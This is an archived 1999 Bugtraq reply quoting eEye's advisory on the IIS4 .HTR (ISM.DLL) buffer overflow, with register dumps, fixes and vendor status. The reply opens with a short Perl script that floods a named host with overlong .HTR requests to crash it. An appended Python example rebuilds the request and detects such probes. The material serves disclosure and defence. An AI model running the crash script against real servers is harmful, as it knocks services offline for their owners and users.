[10827] in bugtraq


Re: Retina vs. IIS4, Round 2, KO

daemon@ATHENA.MIT.EDU (Ryan R Permeh)
Tue Jun 15 19:24:12 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Message-Id: <u1zfdxgwc.fsf@rconnect.com>
Date: 	Tue, 15 Jun 1999 17:01:23 -0500
Reply-To: Ryan R Permeh <rrpermeh@RCONNECT.COM>
From: Ryan R Permeh <rrpermeh@RCONNECT.COM>
X-To:         eEye - Digital Security Team <eeye@EEYE.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  eEye - Digital Security Team's message of "Tue, 15 Jun 1999
              12:18:16 -0000"

Tested, this works for me... scripting was turned on... Perl exploit
code follows:

#!/usr/bin/perl
# props to the absu crew
# Crash probe for the IIS4 .HTR (ISM.DLL) overflow described below: sends
# "GET /AAAA...A.htr HTTP/1.0" with path lengths from 2500 to 3499 to the
# host named on the command line. This only triggers the crash; it carries
# no payload.
use strict;
use warnings;
use Net::Telnet;

my $host = shift @ARGV or die "usage: $0 <host>\n";
for (my $i = 2500; $i < 3500; $i++) {
    my $obj = Net::Telnet->new(Host => $host, Port => 80);
    # Net::Telnet's print appends "\n", so the request ends in a blank line
    my $cmd = "GET /" . 'A' x $i . ".htr HTTP/1.0\n";
    print "$cmd\n";
    $obj->print($cmd);
    $obj->close;
}


/ eEye - Digital Security Team <eeye@EEYE.COM> wrote:
| Retina vs. IIS4, Round 2
|
| Systems Affected:
|
| Internet Information Server 4.0 (IIS4)
| Microsoft Windows NT 4.0 SP3 Option Pack 4
| Microsoft Windows NT 4.0 SP4 Option Pack 4
| Microsoft Windows NT 4.0 SP5 Option Pack 4
|
| Release Date:
|
| June 8, 1999
|
| Advisory Code:
|
| AD06081999
|
| Description:
|
| We have been debating how to start out this advisory. How do you explain
| that 90% or so of the Windows NT web servers on the Internet are open to a
| hole that lets an attacker execute arbitrary code on the remote web server?
| So the story starts...
|
| The Goal:
|
| Find a buffer overflow that will affect 90% of the Windows NT web servers on
| the Internet. Exploit this buffer overflow.
|
| The Theory:
|
| There will be overflows in at least one of the default IIS filtered
| extensions (i.e. .ASP, .IDC, .HTR).  The way we think the exploit will take
| place is that IIS will pass the full URL to the DLL that handles the
| extension. Therefore if the ISAPI DLL does not do proper bounds checking it
| will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to
| execute arbitrary code on the remote server.
|
| Entrance Retina:
|
| At the same time as working on this advisory we have been working on the AI
| mining logic for Retina's HTTP module. What better test scenario than this?
| We gave Retina a list of 10 or so extensions common to IIS and instructed it
| to find any possible holes relating to these extensions.
|
| The Grind:
|
| After about an hour Retina found what appeared to be a hole. It displayed
| that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.
| We all crossed our fingers, started up the good ol' debugger and had Retina
| hit the server again.
|
| Note: [overflow] is 3k or so characters... but we will not get into the
| string lengths and such here. View the debug info and have a look for
| yourself.
|
| The Registers:
|
|  EAX = 00F7FCC8 EBX = 00F41130
|  ECX = 41414141 EDX = 77F9485A
|  ESI = 00F7FCC0 EDI = 00F7FCC0
|  EIP = 41414141 ESP = 00F4106C
|  EBP = 00F4108C EFL = 00000246
|
| Note: Retina was using "A" (0x41 in hex) for the character to overflow with.
| If you're not familiar with buffer overflows a quick note would be that
| getting our bytes into any of the registers is a good sign, and directly
| into EIP makes it even easier :)
|
| Explain This:
|
| The overflow is in relation to the .HTR extensions. IIS includes the
| capability to allow Windows NT users to change their password via the web
| directory /iisadmpwd/. This feature is implemented as a set of .HTR files
| and the ISAPI extension file ISM.DLL. So somewhere along the line when the
| URL is passed through to ISM.DLL, proper bounds checking is not done and our
| overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default
| on IIS4 servers. Looks like we got our 90% of the Windows NT web servers
| part down. However, can we exploit this?
|
| The Exploit:
|
| Yes. We can definitely exploit this and we have. We will not go into much
| detail here about how the buffer is exploited and such. Read the comments in
| the asm file for more information. However, one nice thing to note is that
| the exploit has been crafted in such a way to work on SP4 and SP5 machines,
| therefore there is no guessing of offsets and possible accidental crashing
| of the remote server. We have not tested the exploit on SP3 and would love
| to know if it works or not. eMail alert@eEye.com if you've successfully
| exploited this hole on SP3.
|
| For more details about the exploit visit the eEye web site at www.eEye.com
|
| The Fallout:
|
| Almost 90% of the Windows NT web servers on the Internet are affected by
| this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.
| No, we did not try it on the above mentioned. But it is easy to verify if a
| web server is exploitable without using the exploit. Even a server that's
| locked in a guarded room behind a Cisco Pix can be broken into with this
| hole. This is a reminder to all software vendors that testing for common
| security holes in your software is a must. Demand more from your software
| vendors.
|
| The Request. (Well one anyway.)
|
| Dear Microsoft,
|
| One of the things that we found out is that IIS did not log any trace of our
| attempted hack. We recommend that you pass all server requests to the
| logging service before passing them to any ISAPI filters etc... The logging
| service should be, as named, an actual service running in a separate memory
| space so that when inetinfo goes down intrusion signatures are still logged.
|
| Retina vs. IIS4, Round 2. KO.
|
| Fixes:
|
| 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just
| updated their checklist to include this interim fix.
|    http://microsoft.com/security/products/iis/CheckList.asp
| 2. Apply the patch supplied by Microsoft when available.
|    http://microsoft.com/security
|
| Vendor Status:
|
| We contacted Microsoft on June 8th 1999; the eEye Digital Security Team
| provided all information needed to reproduce the exploit and how to fix it.
| Microsoft's security team did confirm the exploit and is releasing a patch
| for IIS.
|
| Related Links
|
| Advisory - On our web site
| http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
|
| Advisory - Retina Brain File used to uncover the hole
| http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
|
| Retina - The Network Security Scanner
| http://www.eEye.com/retina/
|
|
| Greetings go out to:
|
| The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN
| and any other security company or organization that believes in full
| disclosure.
|
| Copyright (c) 1999 eEye Digital Security Team
|
| Permission is hereby granted for the redistribution of this alert
| electronically. It is not to be edited in any way without express consent of
| eEye. If you wish to reprint the whole or any part of this alert in any
| other medium excluding electronic medium, please e-mail alert@eEye.com for
| permission.
|
| Disclaimer:
|
| The information within this paper may change without notice. Use of this
| information constitutes acceptance for use in an AS IS condition. There are
| NO warranties with regard to this information. In no event shall the author
| be liable for any damages whatsoever arising out of or in connection with
| the use or spread of this information. Any use of this information is at the
| user's own risk.
|
| Please send suggestions, updates, and comments to:
|
| eEye Digital Security Team
|
| info@eEye.com
| www.eEye.com
|
|

--
----------------------------------------------------------------
Ryan R Permeh        E-MAIL: rrpermeh@rconnect.com
IS Engineer          WEB   : http://www.rconnect.com
Rural Connections    HELP  : help@rconnect.com
                     FAQ   : http://www.rconnect.com/help
                     SALES : sales@rconnect.com
----------------------------------------------------------------
120 First Street NE  PHONE : (507) 281-5005
Rochester, MN 55906  FAX   : (507) 281-9272
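As an added example (not part of Ryan's post or of eEye's advisory), the probe request the Perl loop sends is reconstructed here as a byte string, beside detection logic for the same traffic as a proxy or network sensor would see it. The second half matters because the advisory points out that IIS itself logged nothing once inetinfo.exe went down, so the record of a probe has to be kept somewhere other than the server. The 2000-byte path threshold, the sample request lines and the /iisadmpwd/example.htr file name are assumptions made for this example; nothing is sent anywhere.

```python
# Added example: not code from the original post or from eEye's advisory.
# Assumptions made here: the 2000-byte path threshold, the sample request
# lines and the /iisadmpwd/example.htr file name are constructed.
import re
from urllib.parse import urlsplit

MIN_PROBE_LEN = 2500         # lower bound of the Perl loop
MAX_PROBE_LEN = 3500         # exclusive upper bound of the Perl loop
SUSPICIOUS_PATH_LEN = 2000   # assumption: far above any legitimate .HTR path

_REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def build_probe(length: int, filler: bytes = b"A") -> bytes:
    """Return the .HTR probe request for one filler length.

    Mirrors the Perl: "GET /" . 'A' x $i . ".htr HTTP/1.0". HTTP/1.0 wants
    CRLF line endings and an empty line to end the headers; the Perl got its
    blank line from Net::Telnet appending a newline to the request.
    """
    return b"GET /" + filler * length + b".htr HTTP/1.0\r\n\r\n"


def probe_lengths() -> range:
    """The path lengths the Perl loop walks through: 2500 .. 3499."""
    return range(MIN_PROBE_LEN, MAX_PROBE_LEN)


def parse_request_line(line: bytes):
    """Split 'METHOD target HTTP/x.y' into its parts, or None if malformed."""
    parts = line.splitlines()
    first = parts[0] if parts else b""
    m = _REQUEST_LINE.match(first)
    if m is None:
        return None
    method, target, version = m.groups()
    return method.decode("ascii"), target.decode("latin-1"), version.decode("ascii")


def _is_htr(path: str) -> bool:
    """True if any path segment would be handed to ISM.DLL by its .HTR extension.

    The extension can sit in a middle segment (path-info after the script
    name) and NTFS names are case-insensitive, so checking only the final
    segment or exact case would be bypassable.
    """
    return any(seg.lower().endswith(".htr") for seg in path.split("/"))


def classify(line: bytes) -> str:
    """Return "overflow-probe", "htr-request", "benign" or "malformed"."""
    parsed = parse_request_line(line)
    if parsed is None:
        return "malformed"
    _, target, _ = parsed
    path = urlsplit(target).path          # drop any ?query before measuring
    if not _is_htr(path):
        return "benign"
    if len(path) >= SUSPICIOUS_PATH_LEN:
        return "overflow-probe"
    # Once the .HTR mapping is removed (fix 1 in the advisory), any .HTR
    # request is worth a look: either the password-change feature is still
    # in use, or someone is checking whether the mapping is still present.
    return "htr-request"


def flag_htr_requests(lines):
    """Return (index, verdict) for every request line that is not benign."""
    flagged = []
    for i, line in enumerate(lines):
        verdict = classify(line)
        if verdict != "benign":
            flagged.append((i, verdict))
    return flagged


# Constructed sample traffic for this example (not captured data).
SAMPLE_REQUESTS = [
    b"GET /default.asp HTTP/1.0\r\n",
    b"GET /iisadmpwd/example.htr HTTP/1.0\r\n",            # assumed file name
    build_probe(MIN_PROBE_LEN),                            # first probe of the loop
    b"GET /scripts/x.HTR/extra/path?len=1 HTTP/1.0\r\n",   # path-info plus query
    b"junk",
]

if __name__ == "__main__":
    for idx, verdict in flag_htr_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {verdict}")
```

Running the block prints one verdict per non-benign sample line. The "htr-request" class is deliberately noisy: after the .HTR mapping has been removed as the advisory's interim fix, legitimate traffic to those files should be near zero, so what remains is mostly reconnaissance. The threshold only catches the crash probe; a working exploit could use a shorter path, so the extension check is the one to keep.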
